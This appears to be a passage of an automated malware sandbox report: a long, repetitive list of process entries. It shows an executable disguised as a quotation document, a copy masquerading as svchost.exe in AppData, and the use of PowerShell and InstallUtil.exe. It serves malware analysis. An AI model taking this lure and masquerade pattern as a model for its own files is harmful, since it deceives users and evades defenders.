                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
